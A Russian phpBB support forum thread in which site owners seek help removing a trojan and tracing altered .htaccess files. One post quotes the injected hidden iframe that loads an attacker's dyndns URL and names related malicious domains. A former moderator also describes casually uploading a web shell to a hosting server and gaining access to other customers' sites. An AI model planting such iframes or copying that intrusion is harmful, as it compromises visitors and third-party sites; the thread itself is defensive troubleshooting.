Уважаемые пользователи!
C 7 ноября 2020 года phpBB Group прекратила выпуск обновлений и завершила дальнейшее развитие phpBB версии 3.2.
С 1 августа 2024 года phpBB Group прекращает поддержку phpBB 3.2 на официальном сайте.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до 31 декабря 2024 года.
С учетом этого, настоятельно рекомендуется обновить конференции до версии 3.3.

Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Стаж: 17 лет 7 месяцев
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba »

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html
Аватара пользователя
МайскийЖук
phpBB 3.0.7-PL1
Сообщения: 2535
Стаж: 14 лет 6 месяцев
Поблагодарили: 78 раз

Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение МайскийЖук »

Проверил файлы — вредоносного кода нет. Да и на сайте теперь тоже ничего нет, антивирус больше не ругается. Исправилось само собой?
Любовь и боль, покой и бой я как любой несу с собой…
lesha20
phpBB 1.4.0
Сообщения: 31
Стаж: 11 лет 7 месяцев
Благодарил (а): 5 раз
Поблагодарили: 1 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение lesha20 »

Спасибо за уделенное внимание, но вопрос остается подвешенным - каким способом можно изменить файлы .htaccess, не затронув информацию о его дате изменения? Где дыра?
Аватара пользователя
МайскийЖук
phpBB 3.0.7-PL1
Сообщения: 2535
Стаж: 14 лет 6 месяцев
Поблагодарили: 78 раз

Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение МайскийЖук »

Да кто ж его знает-то? Это только на уровне ясновидения можно узнать.
Любовь и боль, покой и бой я как любой несу с собой…
lesha20
phpBB 1.4.0
Сообщения: 31
Стаж: 11 лет 7 месяцев
Благодарил (а): 5 раз
Поблагодарили: 1 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение lesha20 »

У вас, случайно, ясновидещий не найдется?
Аватара пользователя
МайскийЖук
phpBB 3.0.7-PL1
Сообщения: 2535
Стаж: 14 лет 6 месяцев
Поблагодарили: 78 раз

Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение МайскийЖук »

Не. Все штатные телепаты в отпуске.
Любовь и боль, покой и бой я как любой несу с собой…
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 17 лет 1 месяц
Откуда: Калининград не Кенигсберг
Благодарил (а): 41 раз
Поблагодарили: 1716 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение Sheer »

Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
lesha20
phpBB 1.4.0
Сообщения: 31
Стаж: 11 лет 7 месяцев
Благодарил (а): 5 раз
Поблагодарили: 1 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение lesha20 »

Даже не знаю в каком направлении дальше развиваться - ясновидения или хакера-программиста?
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 17 лет 1 месяц
Откуда: Калининград не Кенигсберг
Благодарил (а): 41 раз
Поблагодарили: 1716 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение Sheer »

lesha20 писал(а):Даже не знаю в каком направлении дальше развиваться
Я подскажу. Меняй пароли доступа к FTP и храни их в бумажнике вместо с двухдолларовой бумажкой.
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
lesha20
phpBB 1.4.0
Сообщения: 31
Стаж: 11 лет 7 месяцев
Благодарил (а): 5 раз
Поблагодарили: 1 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение lesha20 »

У меня первый случай изменения файлов .htaccess был 18.12.12, после которого я поменял все пароли - по ftp, к базе данных. Храню их в зашифрованном архиве rar. Но конечно, я часто меняю шаблоны, закачивая их через клиент FileZilla Client или ISPManager - кто-то уже успел перехватить пароли, что-ли?
Аватара пользователя
МайскийЖук
phpBB 3.0.7-PL1
Сообщения: 2535
Стаж: 14 лет 6 месяцев
Поблагодарили: 78 раз

Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение МайскийЖук »

Может у тебя на компе троян какой-нибудь, ворующий пароли. Откуда мы можем знать? Разбирайся. Анализируй.
Любовь и боль, покой и бой я как любой несу с собой…
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 17 лет 1 месяц
Откуда: Калининград не Кенигсберг
Благодарил (а): 41 раз
Поблагодарили: 1716 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение Sheer »

Проблема может быть не у тебя, а у дырявого сайта, который расположен на том же хостинге. Если через него залили шелл, например такой Интересный руткит
то могли получить доступ ко всем сайтам на этом хостинге, и даже к базам данных.
Каюсь, я экспериментировал с той штукой, и залил его на сервер одного солидного хостера, где находятся сайты известных местных предприятий и учреждений. Так вот я получил доступ к половине из них, и допустим, прочитав конфигурационные файлы, мог бы узнать оттуда пароли к базам данных, а далее... у.... чтоб я мог там натворить. Страшно самому стало, и его быстренько потер оттуда. Так вот...
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Аватара пользователя
Борис Бердичевский
phpBB 3.0.0 RC1
Сообщения: 1457
Стаж: 16 лет 3 месяца
Откуда: Израиль, Беэр-Шева
Благодарил (а): 33 раза
Поблагодарили: 61 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение Борис Бердичевский »

А как можно "залить шелл"? Это что -- есть дырка в FTP доступе?
После нескольких лет общения здесь и техсопровождения форумов я наконец понял, что ничего не понимаю в phpBB!
Аватара пользователя
Sheer
Former team member
Сообщения: 12113
Стаж: 17 лет 1 месяц
Откуда: Калининград не Кенигсберг
Благодарил (а): 41 раз
Поблагодарили: 1716 раз

Re: Изменены все файлы .htaccess - уязвимость скриптов?

Сообщение Sheer »

Борис Бердичевский
Интересный руткит
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
fanatic
phpBB 2.0.0
Сообщения: 244
Стаж: 15 лет

Re: Как убить Трояна?

Сообщение fanatic »

и снова вирусня - опишу что получилось узнать.
вот эти сайты левые при загрузке страницы подгружабтся
brsoftech.in
startinfobb.dyndns.info

вот с этого сайта house.404.mn/images/pay6_bg.jpg картинка подгружается с надписью @site content security@ + поле ввода телефона и кнопкой отправить.
яндекс вебмастер выдает зараженные страницы
сайт/viewtopic.php?f=
сайт/index.php

если сайт статичный, то страницы html
к сожалению - это все что удалось пока найти на эту заразу. никаких iframe нет в этих фалах и ссылок написанных выше тоже.

Если кто то имеет представление как найти, напишите.

Добавлено спустя 8 минут 20 секунд:
Вроде как такой код у этой штуки

Код: Выделить всё

<iframe width="2" height="2" frameborder="0"src="http://startinfobb.dyndns.info/statb.php?i=22516">
<html>
<head>
<body>
</html>
</iframe>
Последний раз редактировалось fanatic 25.02.2013 11:51, всего редактировалось 1 раз.
Аватара пользователя
МайскийЖук
phpBB 3.0.7-PL1
Сообщения: 2535
Стаж: 14 лет 6 месяцев
Поблагодарили: 78 раз

Как убить Трояна?

Сообщение МайскийЖук »

вот с этого картинка поля берется
А если вот эту фразу на русский язык перевести, то как она будет выглядеть?
Любовь и боль, покой и бой я как любой несу с собой…

Вернуться в «phpBB-пространство»